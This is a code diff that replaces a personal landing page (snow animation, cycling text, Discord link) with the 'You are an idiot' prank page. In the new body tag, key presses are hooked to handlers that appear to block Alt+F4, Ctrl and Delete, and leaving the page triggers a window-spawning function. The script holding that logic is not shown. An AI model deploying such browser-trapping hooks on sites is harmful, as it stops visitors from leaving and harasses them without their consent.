--- a/index.html
+++ b/index.html
@@ -1,110 +1,23 @@
-<!DOCTYPE html>
-<html lang="en">
+<html>
 <head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>O.O</title>
-    <style>
-        body {
-            background-color: #000;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
-            margin: 0;
-            overflow: hidden;
-            user-select: none; /* Disable text selection for the entire body */
-        }
+<title>You are an idiot! (dot org)</title>
 
-        a {
-            color: #fff;
-            text-decoration: none; 
-            font-size: 24px;
-            font-family: Tahoma, Verdana, sans-serif;
-            position: relative; 
-        }
+<meta name="Author" content="The ADR and Jazzy">
+<meta name="Keywords" content="you are an idiot, you, are, an, idiot, fool, youdontknowwhoiam.org, youdontknowwhoiam, you dont know who i am, you, dont, know, who, i, am, org, dot, aregner, jazzy, adr">
+<meta name="Description" content="This is the orgional and the best flash video on the 'net.  Once found on www.youdontknowwhoiam.org, not found where it belong, right here on www.youareanidiot.org.">
 
-        .snowflake {
-            position: absolute;
-            color: #fff;
-            font-size: 20px;
-            animation: snowfall linear infinite;
-        }
+<script src="you.js"></script>
 
-        @keyframes snowfall {
-            to {
-                transform: translateY(100vh);
-            }
-        }
-
-        * {cursor: url(https://cur.cursors-4u.net/others/images3/oth256.png), auto !important;} 
-    </style>
-    <script src="snow.js"></script>
 </head>
-<body>
-    <a id="typedText" href="https://discord.gg/jak" target="_blank"></a>
 
-    <audio id="backgroundMusic" loop>
-        <source src="audio/AMG.mp3" type="audio/mp3">
-        Your browser does not support the audio tag.
-    </audio>
+<body bgcolor="#ffffff" onkeydown="altf4key();ctrlkey();delkey();" onunload="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
 
-    <script>
-        document.addEventListener('DOMContentLoaded', function () {
-            const textElement = document.getElementById('typedText');
-            const phrases = [
-                "netfl8x on top lol",
-                "xeno eldar",
-                ".gg/jak",
-                "credits to fraud.gay",
-                "(°-°) O.o"
-            ];
+<object width="100%" height="100%" data="youare.swf">
+  <param name="movie" value="youare.swf">
+  <param name="quality" value="high">
+  <embed src="/youare.swf" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%">
+  </embed> 
+</object> 
 
-            function shuffleArray(array) {
-                for (let i = array.length - 1; i > 0; i--) {
-                    const j = Math.floor(Math.random() * (i + 1));
-                    [array[i], array[j]] = [array[j], array[i]];
-                }
-                return array;
-            }
-
-            // Shuffle the phrases array
-            shuffleArray(phrases);
-
-            let index = 0;
-
-            function cycleText() {
-                textElement.textContent = phrases[index];
-                index = (index + 1) % phrases.length;
-                setTimeout(cycleText, 2000); // Change text every 2 seconds (adjust as needed)
-            }
-
-            // Start the cycling text on page load
-            cycleText();
-
-            const numberOfSnowflakes = 50;
-
-            for (let i = 0; i < numberOfSnowflakes; i++) {
-                createSnowflake();
-            }
-
-            function createSnowflake() {
-                const snowflake = document.createElement('div');
-                snowflake.className = 'snowflake';
-                snowflake.innerHTML = '❄';
-                snowflake.style.left = `${Math.random() * 100}vw`;
-                snowflake.style.animationDuration = `${Math.random() * 2 + 2}s`;
-                document.body.appendChild(snowflake);
-            }
-
-            // Ensure the background music plays after a user interaction (e.g., click)
-            document.body.addEventListener('click', function() {
-                const backgroundMusic = document.getElementById('backgroundMusic');
-                backgroundMusic.play().catch(function(error) {
-                    console.error('Autoplay was prevented:', error);
-                });
-            });
-        });
-    </script>
 </body>
 </html>
